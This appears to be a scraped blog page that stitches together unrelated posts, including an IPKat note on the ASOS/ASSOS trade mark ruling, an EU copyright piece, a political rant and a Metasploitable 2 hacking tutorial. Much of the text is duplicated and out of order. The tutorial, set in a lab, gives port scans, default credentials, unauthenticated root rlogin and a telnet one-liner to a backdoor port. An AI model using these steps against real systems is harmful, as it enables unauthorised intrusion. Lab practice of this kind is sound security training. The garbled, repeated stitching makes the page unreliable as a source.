Delete/ Get Rid of TR/BProtector.Gen2 Virus and Fix Chaos
Reviewed by 0x000216
on
Thursday, May 01, 2014
Rating: 5
How to assess ASSOS: General Court tells all
Case T 647/11 Asos plc v Office for Harmonisation in the Internal Market (Trade Marks and Designs) (OHIM), Roger Maier, a decision of the General Court of the European Union (Seventh Chamber) this past Tuesday, is just one piece in a rather larger jigsaw of interlocking litigation between two assertive brand owners. It's also another sad testament to the dreadfully long time that it seems to take from cradle to grave, as it were, for a Community trade mark application.
Way back in 2005 Asos applied to register the word ASOS as a Community trade mark (CTM) for a range of goods in Classes 3, 18 and 25 and services in Class 35. The goods in Class 18 included ‘articles of leather and imitations of leather; bags; handbags; shoulder bags; bumbags; sports bags; casual bags; briefcases; attaché cases; satchels; beauty cases; credit card cases and holders; wallets; purses; belts; parts and fittings for all the aforesaid goods’. Maier opposed, basing the opposition on his later Community word mark ASSOS, which had the good fortune to be able to enjoy the priority of a Swiss trade mark application filed on 14 June 2005, just 16 days ahead of Asos's effort. The earlier mark was for ‘bleaching preparations and other substances for laundry use; cleaning, polishing, scouring and abrasive preparations; soaps; perfumery, essential oils, cosmetics, hair lotions; dentifrices’ (Class 3), ‘vehicles; apparatus for locomotion by land, air or water’ (Class 12) and ‘clothing, footwear, headgear’ (Class 25). According to Maier, consumers were likely to be confused, given the similarity of the respective marks and the identity or similarity of their goods and services.
Slow-forward to October 2010. That's when the Opposition Division partially upheld the opposition. Yes, it said, there was a likelihood of confusion with regard to all the goods and services in Classes 3, 25 and 35 and also with regard to the following goods in Class 18: ‘articles of leather and imitations of leather; bags; handbags; shoulder bags; bumbags; sports bags; casual bags; briefcases; attaché cases; satchels; beauty cases; credit card cases and holders; wallets; purses; belts; parts and fittings for all the aforesaid goods’.
Asos appealed more or less immediately and, just one year later, in October 2011, got some joy from OHIM's Fourth Board of Appeal. The Board found that the relevant public was the general public in the European Union, deemed to be reasonably well informed and reasonably observant and circumspect [except, says Merpel, when it comes to election time]. Comparing the goods and services, the Board of Appeal held, contrary to the Opposition Division, that ‘bumbags; sports bags; casual bags; briefcases; attaché cases; satchels; beauty cases; credit card cases and holders; wallets; purses’ in Class 18 were not similar to the goods covered by Maier’s earlier mark.
Comparing the marks, while Asos's goods in Class 18 (‘articles of leather and imitations of leather; bags; handbags; shoulder bags; belts; parts and fittings for all the aforesaid goods’) were similar to the goods covered by the earlier mark, the Board of Appeal, taking account of the fact that those signs shared the letters ‘a’, ‘s’, ‘o’ and ‘s’ and differed only in the additional letter ‘s’ in the earlier mark -- and of the fact that that additional letter ‘s’ is hardly audible in many [is it truly audible in any?] of the languages of the European Union -- held that ASOS and ASSOS were very similar both visually and phonetically; in conceptual terms their comparison was neutral in so far as neither of those marks had any meaning for the majority of the relevant public. Overall, having regard to the average distinctiveness of the earlier mark and the high degree of visual and phonetic similarity between the signs, there was a likelihood of confusion in respect of the identical and similar goods. Additionally, the Board noted, Asos had not succeeded in proving that the marks at issue coexisted peacefully within the territory of the European Union [This Kat likes the idea of peaceful coexistence. In his book, the relationship of peaceful coexistence to negotiated coexistence agreements is broadly the same as that of living together when compared with marriage ...].
There was now a general appealfest. Asos applied to the General Court to have the decision of the Board of Appeal annulled in so far as it refused registration of the mark for which it had sought protection, while Maier applied to have the decision of the Board of Appeal amended in so far as it found that there was no likelihood of confusion in respect of the goods listed in Class 18.
Without actually saying "A plague on both your houses", the General Court dismissed both sides' pleas. Its reasoning was based on, among other things, the following considerations:
Assessment of the conceptual element of the ASOS mark
Asos submitted that the Board of Appeal failed to take into account the correct conceptual meaning of the ASOS mark in its global assessment of the likelihood of confusion on the ground that a significant portion of the relevant public will perceive the trade mark applied for, ASOS, as the acronym for ‘as seen on screen’, on the ground that it was the largest independent online retailer of fashion articles and beauty products in the UK and enjoyed extremely high sales throughout the EU. No, said the court. Admittedly, one portion of the English-speaking public will perceive the word ASOS as the acronym for ‘as seen on screen’ and, for that portion of the public, ASOS and ASSOS are conceptually different. However, the other portion of the English-speaking public will not regard ASOS as the acronym for ‘as seen on screen’. Further, given that it is common ground that the relevant public is the public throughout the EU, the relevant public does not consist solely of an English-speaking public. The word element ‘asos’ is not a known acronym and the expression ‘as seen on screen’ is not a basic English expression, likely to be understood by the non-Anglophone public. For the majority of the relevant public, therefore, neither of the signs at issue has a meaning and the conceptual comparison is neutral, as the Board of Appeal observed.
Evidence of peaceful coexistence
Asos maintained that it had demonstrated the peaceful coexistence of the ASOS and ASSOS marks in 18 EU Member States and that the Board of Appeal ought to have taken this into account. No, again, said the court: it cannot be entirely ruled out that, in certain cases, the peaceful coexistence of marks on the market could reduce the likelihood of confusion found by the decision-making bodies of OHIM to exist ["Cannot be entirely ruled out"? This is the sort of language one expects when discussing the existence of the Yeti or Bigfoot]. However, that possibility can be taken into consideration only if, at the very least, during the proceedings before OHIM concerning relative grounds for refusal, the party applying for the Community trade mark duly demonstrated that such coexistence was based on the absence of any likelihood of confusion, on condition that the earlier marks concerned and the marks at issue are identical [Does anyone know why they have to be identical? This looks an arbitrary criterion and an unnecessary restriction in terms of protecting trade mark owners, their competitors and the consumer]. The Board of Appeal concluded that the items of evidence provided by Asos, consisting of two declarations from the head of its legal department, should be [rightly] rejected, since they emanated from Asos itself and were not supported by any additional information originating from independent sources. That finding by the Board of Appeal must be upheld since a declaration originating from the applicant cannot be attributed probative value unless it is corroborated by other items of evidence.
This evidence was ineffective anyway. It did not permit any conclusion to be drawn as to the absence of a likelihood of confusion since it related only to the use of the ASOS trade mark and did not address the manner in which the relevant public was exposed to the ASOS and ASSOS marks together on the same market. What's more, it only addressed the position in 18 EU Member States.
Comparison of goods in Class 18
Finally, the Board of Appeal was right to find that the ‘bumbags; sports bags; casual bags; briefcases; attaché cases; satchels; beauty cases; credit card cases and holders; wallets; purses’ in Class 18 — in contrast with the ‘clothing, footwear, headgear’ in Class 25, which had an aesthetic function — essentially had a practical function, namely that of containing sports equipment, documents, banknotes and coins. Bumbags etc had no aesthetic function and apparently, according to the General Court which obviously knows about these things, are not included in the marketing strategy for fashion accessories. The parties' goods were not complementary and it was unlikely that, when buying a briefcase or a wallet, the purchaser would be asked about the colour of the suits or shoes normally worn or, when buying a sports bag, the colour of his tracksuit. Even if the respective goods had the same distribution channels and the same end users, that would not mean that there was a similarity between them.
Will this be an end to the matter? Asos and Assos have been engaged in some vigorous litigation in England and Wales, where each of them has obtained a measure of satisfaction from the three judgments so far (here, here and here).
Of interest to this Kat was the comments of the General Court concerning the evidential value of litigation before national courts (in this case in England and Wales). Said the court at [17] to [19]:
Fashionable bumbags here
Cheap and cheerful bumbags here
The Cat's Whiskers: iconic timepiece from the Asos.com website, here |
Slow-forward to October 2010. That's when the Opposition Division partially upheld the opposition. Yes, it said, there was a likelihood of confusion with regard to all the goods and services in Classes 3, 25 and 35 and also with regard to the following goods in Class 18: ‘articles of leather and imitations of leather; bags; handbags; shoulder bags; bumbags; sports bags; casual bags; briefcases; attaché cases; satchels; beauty cases; credit card cases and holders; wallets; purses; belts; parts and fittings for all the aforesaid goods’.
Asos appealed more or less immediately and, just one year later, in October 2011, got some joy from OHIM's Fourth Board of Appeal. The Board found that the relevant public was the general public in the European Union, deemed to be reasonably well informed and reasonably observant and circumspect [except, says Merpel, when it comes to election time]. Comparing the goods and services, the Board of Appeal held, contrary to the Opposition Division, that ‘bumbags; sports bags; casual bags; briefcases; attaché cases; satchels; beauty cases; credit card cases and holders; wallets; purses’ in Class 18 were not similar to the goods covered by Maier’s earlier mark.
Good news: no Kats were used in the manufacture of this product ... |
There was now a general appealfest. Asos applied to the General Court to have the decision of the Board of Appeal annulled in so far as it refused registration of the mark for which it had sought protection, while Maier applied to have the decision of the Board of Appeal amended in so far as it found that there was no likelihood of confusion in respect of the goods listed in Class 18.
Without actually saying "A plague on both your houses", the General Court dismissed both sides' pleas. Its reasoning was based on, among other things, the following considerations:
Assessment of the conceptual element of the ASOS mark
Asos submitted that the Board of Appeal failed to take into account the correct conceptual meaning of the ASOS mark in its global assessment of the likelihood of confusion on the ground that a significant portion of the relevant public will perceive the trade mark applied for, ASOS, as the acronym for ‘as seen on screen’, on the ground that it was the largest independent online retailer of fashion articles and beauty products in the UK and enjoyed extremely high sales throughout the EU. No, said the court. Admittedly, one portion of the English-speaking public will perceive the word ASOS as the acronym for ‘as seen on screen’ and, for that portion of the public, ASOS and ASSOS are conceptually different. However, the other portion of the English-speaking public will not regard ASOS as the acronym for ‘as seen on screen’. Further, given that it is common ground that the relevant public is the public throughout the EU, the relevant public does not consist solely of an English-speaking public. The word element ‘asos’ is not a known acronym and the expression ‘as seen on screen’ is not a basic English expression, likely to be understood by the non-Anglophone public. For the majority of the relevant public, therefore, neither of the signs at issue has a meaning and the conceptual comparison is neutral, as the Board of Appeal observed.
Evidence of peaceful coexistence
The Yeti, like peaceful coexistence, "cannot be entirely ruled out" ... |
This evidence was ineffective anyway. It did not permit any conclusion to be drawn as to the absence of a likelihood of confusion since it related only to the use of the ASOS trade mark and did not address the manner in which the relevant public was exposed to the ASOS and ASSOS marks together on the same market. What's more, it only addressed the position in 18 EU Member States.
Comparison of goods in Class 18
Finally, the Board of Appeal was right to find that the ‘bumbags; sports bags; casual bags; briefcases; attaché cases; satchels; beauty cases; credit card cases and holders; wallets; purses’ in Class 18 — in contrast with the ‘clothing, footwear, headgear’ in Class 25, which had an aesthetic function — essentially had a practical function, namely that of containing sports equipment, documents, banknotes and coins. Bumbags etc had no aesthetic function and apparently, according to the General Court which obviously knows about these things, are not included in the marketing strategy for fashion accessories. The parties' goods were not complementary and it was unlikely that, when buying a briefcase or a wallet, the purchaser would be asked about the colour of the suits or shoes normally worn or, when buying a sports bag, the colour of his tracksuit. Even if the respective goods had the same distribution channels and the same end users, that would not mean that there was a similarity between them.
Will this be an end to the matter? Asos and Assos have been engaged in some vigorous litigation in England and Wales, where each of them has obtained a measure of satisfaction from the three judgments so far (here, here and here).
Of interest to this Kat was the comments of the General Court concerning the evidential value of litigation before national courts (in this case in England and Wales). Said the court at [17] to [19]:
17 On 21 December 2012, the intervener provided the General Court with a copy of a decision of the High Court of Justice (England & Wales), Chancery Division, of 23 November 2012, as evidence of the existence of a likelihood of confusion. On 8 November 2013, the applicant provided the General Court with a copy of a decision of the High Court of Justice (England & Wales), Chancery Division, of 19 September 2013, as evidence of the absence of any likelihood of confusion.As it turns out, they had no probative value -- but that's another matter.
18 Those decisions, although produced for the first time before the General Court, are not strictly evidence but relate to national case-law, to which, even after the procedure before OHIM is complete, a party has the right to refer ... Neither the parties nor the General Court itself can be precluded from drawing on national case-law for the purposes of interpreting EU law. That possibility of referring to national decisions is not covered by the case-law according to which the action before the Court seeks review of the legality of decisions of the Boards of Appeal in the light of the evidence submitted by the parties before the latter, where the purpose is not to criticise the Boards of Appeal on the ground that they failed to take the factual aspects of a specific national decision into account, but rather to cite decisions in support of a plea alleging that the Boards of Appeal infringed a provision of Regulation No 207/2009 ...
19 It follows that the decisions of the High Court of Justice (England & Wales), Chancery Division, provided by the intervener and the applicant are admissible.
Fashionable bumbags here
Cheap and cheerful bumbags here
How to assess ASSOS: General Court tells all
Reviewed by 0x000216
on
Thursday, May 01, 2014
Rating: 5
How-to install a Arch linux LAMP Server apache mariadb php plus static ip and webmin admin panel
Tip: Watch the video full screen and HD.
LAMP is a combination of free, open source software. The acronym LAMP refers to the first letters of Linux (operating system), Apache HTTP Server, MySQL (database software), and PHP, Perl or Python, principal components to build a viable general purpose web server.
The exact combination of software included in a LAMP package may vary, especially with respect to the web scripting software, as Perl or Python are sometimes dropped from the stack. Similar terms exist for essentially the same software suite (AMP) running on other operating systems, such as Microsoft Windows (WAMP), Mac OS (MAMP), Solaris (SAMP), iSeries (iAMP), or OpenBSD (OAMP).
Though the original authors of these programs did not design them all to work specifically with each other, the development philosophy and tool sets are shared and were developed in close conjunction. The software combination has become popular because it is free of cost, open-source, and therefore easily adaptable, and because of the ubiquity of its components which are bundled with most current Linux distributions.
PLEASE SUBSCRIBE AND FOLLOW ME ON TWITTER!!
https://twitter.com/ribalinux
Blogger
http://ribalinux.blogspot.pt/
https://www.facebook.com/theribalinux
Google+
https://plus.google.com/u/0/110348492032614636584/posts
GET 20 GB OF FREE CLOUD STORAGE FOR YOUR LINUX BOX
https://copy.com?r=YOSJw9
Music
"Airglow" (by Stellardrone)
(http://freemusicarchive.org/music/Stellardrone/
Light_Years_1227/02_Airglow)
Licensed under Creative Commons Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
How-to install a Arch linux LAMP Server apache mariadb php plus static
ip and webmin admin panel
Reviewed by 0x000216
on
Thursday, May 01, 2014
Rating: 5
The right of adaptation has not been generally harmonised at the EU level: true or false?
Gigi is very adaptable when it comes to where to sleep, but is this what the adaptation right is about? |
Calling all students who are revising for their spring exams! What is the right answer to this question?
Until now most people - including a number of leading copyright academics - would have easily opted for 'true'.
However, following a number of recent decisions of the Court of Justice of the European Union (CJEU) and the even more recent leaked text of the draft Impact Assessment (IA) of the Commission on the modernisation of the EU copyright acquis [here and here] this may no longer be the right answer.
First of all: what is the right of adaptation all about?
As explained by leading UK copyright commentary Copinger and Skone James on Copyright, adaptation is usually understood as the transformation of a work into another form of expression that is not tantamount to a simple reproduction, eg making a film out of a novel, although “there is an unclear dividing line between what amounts to a reproduction of a work and what amounts to an adaptation of a work”.
The problem lies indeed here.
At the international level, besides the right of reproduction within Article 9, Article 12 of the Berne Convention states that authors of literary or artistic works shall enjoy the exclusive right of authorising adaptations, arrangements and other alterations of their works. However, the systematic approach of the Berne Convention does not require Union countries to do the same.
As a result, there have remained significant differences in national laws as to whether adaptations and other transformations are to be regarded as forms of reproductions (as is the case, for instance, in France and The Netherlands), or whether they are subject to a separate right (as is the case, for instance, in Italy, Germany and the UK).
As regards EU copyright, the InfoSoc Directive [which - among other things - intended to implement into the EU legal order the WIPO Copyright Treaty, which requires compliance with Articles 1-21 Berne] does not contain any reference to the right of adaptation, which has been instead expressly harmonised in relation to databases [Article 5(b) of Directive 96/9/EC] and computer programs [Article 4(1)(b) of Directive 2009/24/EC].
Therefore, the main question is whether Member States have retained their competence to define the right of adaptation in respect of literary and artistic works [these are the only works subject to Berne right of adaptation and, as such, are the only subject-matter for which possible EU constraints might subsist] other than databases and computer programs, as well as its related exception(s) and limitation(s).
The part about exceptions and limitations is particularly topical.
IPKat readers will remember the very interesting, imaginative and fascinating Modernising Copyright Report released in late 2013 by the Irish Review Committee [if you happen to be in London, do not miss next week's BLACA meeting starring one of the authors of the Report, ie Prof Eoin O'Dell].
This Report included innovative stances on copyright reform policy [this is something to welcome, as boldness and copyright policy have not been seen together very often in recent times], in particular as regards new exceptions and limitations that, while not expressly envisaged in the exhaustive list within Article 5 of the InfoSoc Directive, may be introduced at the level of individual Member States.
Among other things, the Report recommended introducing an innovation exception [here] and also a fair use exception [here].
Speaking of fair use, one of the one of the Terms of Reference for the Review Committee was indeed to "[e]xamine the US style ‘fair use’ doctrine to see if it would be appropriate in an Irish/EU context."
Seeking "to accommodate a range of apparently incompatible views", the Irish Report proposed "a possible draft of a tightly-drawn Irish [so not exactly US-style] fair use exception [according to the Report, this would be necessary to "enable context-sensitive accommodations to be developed as the occasion arises"]", that would be aimed at complementing existing exceptions. These should be exhausted before any claim of fair use could be considered, but also considered as examples of fair use so as to allow workable analogies to be developed.
According to the Report, "there is scope under EU law for member states to adopt a fair use doctrine as a matter of national law, and [the InfoSoc Directive] does not necessarily preclude it (not least because, in our view, [the InfoSoc Directive] has not harmonized the adaptation right [this is also the reason why the Report did not see any obstacles to the adoption of an innovation exception])."
Is this true?
How a Kat feels when the Commission agrees |
This Kat said 'Yes, but just in part' in a recent longer piece [which you can access and download here], and the Commission appears not to disagree [failed attempt to imitate typical British understatement].
At page 99 of its leaked draft IA, the Commission writes:
"Contrary to the reproduction right and the communication to the public/making available right, there is no express rule with respect to adaptations in the InfoSoc Directive (unlike the Software and in the Database Directive). However, the broad manner in which the reproduction right in Article 2 of that Directive is formulated [yet not defined] and the CJEU's jurisprudence on the scope of the reproduction right notably in Infopaq and Eva-Marie Painer seem to cover adaptations which give rise to a further reproduction within the meaning of Article 2. The pending case Allposters [here; this Kat is confident in saying that this will be one of the most important recent copyright rulings] will shed further light on the scope of Article 2."
Here's George after a most engaging 3-hour discussion on the adaptation right under EU law |
From what the Commission said in its draft IA, it would seem that the room left for indipendent national initiatives - including the adoption of national fair use exceptions - is not that broad, and probably not as broad as submitted by the Irish Review Committee.
This is because any exceptions or limitations to the right of adaptation would have to comply not just with the three-step test [see the ACI Adam case for a recent CJEU application], but also be designed in a way that would not transform them into further – and, as such, forbidden – exceptions (in disguise) to other exclusive rights, notably the right of reproduction.
This Kat believes that Member States are free to legislate in relation to exceptions or limitations to the right of adaptation, but these must be intended narrowly, ie as limited to what can be considered as pure adaptations, not transformative uses of a work that nonetheless also involve its simple reproduction.
For instance, while it is arguable that creating a play from a novel may fall exclusively
within the scope of the right of adaptation, it may be more difficult to sustain that the same would happen in the case of an artist that – among other things – reproduced an artistic work in an altered form, eg by adding new elements, or changing the contrast and colour [as recent US fair use examples, see Cariou v Prince and Seltzer v Green Day].
So what is the answer to the initial question? Probably that adaptation has not been expressly and generally harmonised for subject-matter other than computer programs and databases. Nonetheless, Member States' freedom to legislate in respect of this right and related exceptions and limitations does not go as far as to cover activities that would fall within the (broad) scope of the right of reproduction.
The right of adaptation has not been generally harmonised at the EU level: true or false?
Reviewed by 0x000216
on
Thursday, May 01, 2014
Rating: 5
GAS CHAMBER.
The Oklahoma execution debacle was horrible -- maybe even worse than Jonah Goldberg's mouthfarts on the subject. But it's close. First Goldberg basically said he was okay with torturing Clayton Lockett to death because Lockett's horrific crime merited such treatment. I don't know why he decided to come back and make it worse -- laziness, I suppose; he already had done the research -- but yeesh:
Onward:
Goldberg ends by yelling at Will McAvoy, which is just perfect.
UPDATE. Regarding Goldberg's objection to death penalty opponents' "tactics," mds comments, "Like what? Picketing courthouses while holding up photos of grisly executions? Loudly berating anyone who goes in, even for a traffic violation, as being complicit in murder? Yeah, I could see how a principled conservative might find such behavior offensive."
Many of these convicts no doubt deserve worse in the cosmic sense, but it’s not the place of the state to deliver worse. I am strongly for the death penalty but I have no desire to go down the path to medieval forms of execution where we are expected to take pleasure in someone’s final extravagantly choreographed agonies. Moreover, as a political matter, embracing that kind of thing will ultimately undermine the death penalty itself.If we torture more of these guys to death, we may lose the voters! Oh, and get a load of this:
Of course there’s considerable hypocrisy at work when death penalty opponents do everything they can to block more humane and efficient means of execution — i.e. the old drug cocktail — and then complain that the remaining or new techniques are unconstitutional. You can make the case that the Lockett fiasco was a forced error by opponents of the death penalty.See what you stupid libtards did? You made us go to the black market for our killin' drugs. What did you want us to do, wait?
But, I should say, I respect many opponents of the death penalty (even if I recoil at some of their tactics).Goldberg has transformed the pee-dance into a rhetorical form.
Which brings us to the ridiculous claim that the botched execution was cruel and unusual punishment because it was “torture.” I see that Andy beat me to the punch in noting that, as a legal matter, you can’t torture someone by accident.Holy shit, just when you think nothing could be worse, Goldberg enlists National Review's foremost torture enthusiast, Andrew McCarthy, and his legalistic determination as to how guilty people should feel about this disaster (unsurprisingly, not at all).
Onward:
But let me put it another way: Lockett wasn’t sentenced to a botched execution. He was sentenced to be executed. Think of it this way: Last night a Pensacola jail blew up because of a gas leak. At least two people died. We don’t know yet whether they were inmates. But, let’s assume they were. Moreover let’s assume they were being held for petty crimes. Their deaths would not amount to “cruel and unusual punishment” even though most reasonable people would agree that stealing a candy bar or urinating in public shouldn’t be crimes punishable by death. That’s because the explosion was an accident.And this is just like the accident that happened while Oklahoma was trying to kill a guy.
Goldberg ends by yelling at Will McAvoy, which is just perfect.
UPDATE. Regarding Goldberg's objection to death penalty opponents' "tactics," mds comments, "Like what? Picketing courthouses while holding up photos of grisly executions? Loudly berating anyone who goes in, even for a traffic violation, as being complicit in murder? Yeah, I could see how a principled conservative might find such behavior offensive."
GAS CHAMBER.
Reviewed by 0x000216
on
Thursday, May 01, 2014
Rating: 5
tutorial - How to Force fsck (Filesystem check) on next boot
Reviewed by 0x000216
on
Thursday, May 01, 2014
Rating: 5
Metasploitable 2 : Vulnerability assessment and Remote Login
If you've followed my previous tutorial on Introduction to Metasploitable 2, then you should be sitting here with Kali Linux and Metasploitable 2 up and running. So, I'm gonna skip the formalities and move right ahead.
The conclusion that can be drawn here is that the Metasploitable 2 machine has IP 192.168.154.132. Also, it has a huge lot of open ports. As you will discover later, each of these ports is a potential gateway into the machine. On the metasploitable machine, after logging in with msfadmin:msfadmin, you can execute an ifconfig to verify that the IP is indeed 192.168.154.132 (or whatever may be your case).
As you can see, it is asking for a password. It's not because the target is not vulnerable. It's because we don't have ssh-client installed on Kali Linux. The rsh-client is a remote login utility that it will allow users to connect to remote machines.
Now you have an administrator privilege shell on Metasploitable 2. That was as easy as typing one line. (and installing an application). We have one more such vulnerability that can be exploited easily.
Portscan
On a Kali Linux machine, open a terminal. Type ifconfig, and note the eth0 IP address. This will give you an idea of what the ip of your target machine could be. In my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that Metasploitable must have an IP residing somewhere in the 192.168.154.xxx range. To scan all ports in that range, you can use Nmap scan. Here is what it should look like.nmap -sS 192.168.154.0/24
The conclusion that can be drawn here is that the Metasploitable 2 machine has IP 192.168.154.132. Also, it has a huge lot of open ports. As you will discover later, each of these ports is a potential gateway into the machine. On the metasploitable machine, after logging in with msfadmin:msfadmin, you can execute an ifconfig to verify that the IP is indeed 192.168.154.132 (or whatever may be your case).
Vulnerabilities
Now the Metasploitable 2 operating system has been loaded with a large number of vulnerabilites. There are the following kinds of vulnerabilities in Metasploitable 2-
- Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system.
- Backdoors - A few programs and services have been backdoored. These backdoors can be used to gain access to the OS.
- Weak Passwords - These are vulnerable to bruteforce attacks.
- Vulnerable Web Services- A few web services pre-installed into Metasploitable have known vulnerabilities which can be exploited.
- Web Application Vulnerabilities - Some vulnerable web applications can be exploited to gain entry to the system.
There is a very resourceful article about many vulnerabilities on Rapid7 website.
Exploiting The Vulnerabilities
Remote access vulnerability - Rlogin
Remember the list of open ports which you came up across during the port scan? The 512,513 and 514 ports are there for remotely accessing Unix machines. They have been misconfigured in such a way that anyone can set up a remote connection without proper authentication. This vulnerability is easy to exploit. We will use rlogin to remotely login to Metasploitable 2. Type rlogin to see the details about the command structure.
root@kali:~# rlogin
usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec]
[-D [bind_address:]port] [-e escape_char] [-F configfile]
[-I pkcs11] [-i identity_file]
[-L [bind_address:]port:host:hostport]
[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
[-R [bind_address:]port:host:hostport] [-S ctl_path]
[-W host:port] [-w local_tun[:remote_tun]]
[user@]hostname [command]
rlogin -l root 192.168.154.132Most probably you will get something like this-
root@kali:~# rlogin -l root 192.168.154.132The authenticity of host '192.168.154.132 (192.168.154.132)' can't be established.RSA key fingerprint is *****.Are you sure you want to continue connecting (yes/no)? yesWarning: Permanently added '192.168.154.132' (RSA) to the list of known hosts.root@192.168.154.132's password:
As you can see, it is asking for a password. It's not because the target is not vulnerable. It's because we don't have ssh-client installed on Kali Linux. The rsh-client is a remote login utility that it will allow users to connect to remote machines.
apt-get install rsh-clientThis will start the installation progress, you'll have to type yes once or twice, Kali will do the rest for you. After the installation is successful, you should try your previous command again. This time around, things will be better.
root@kali:~# rlogin -l root 192.168.154.132Last login: Thu May 1 11:34:55 EDT 2014 from :0.0 on pts/0Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686The programs included with the Ubuntu system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted byapplicable law.To access official Ubuntu documentation, please visit:http://help.ubuntu.com/You have mail.root@metasploitable:~#
Now you have an administrator privilege shell on Metasploitable 2. That was as easy as typing one line. (and installing an application). We have one more such vulnerability that can be exploited easily.
Telnet Vulnerability
Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a popular FTP server. The version that is installed on Metasploit contains a backdoor. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence ":)" (the happy smiley), the backdoored version will open a listening shell on port 6200. This means anyone can login to a computer without knowing the credentials, just use :). This can be exploited using Metasploit. We will cover this in the next tutorial. Till then something for your appetite-
telnet 192.168.99.131 1524This is a another one line exploit, on the 1524 ingreslock port (see portscan result). I will post more stuff soon, but this is all for now.
Metasploitable 2 : Vulnerability assessment and Remote Login
Reviewed by 0x000216
on
Thursday, May 01, 2014
Rating: 5
tutorial - How To get Harware information in OpenSuse 11
Reviewed by 0x000216
on
Thursday, May 01, 2014
Rating: 5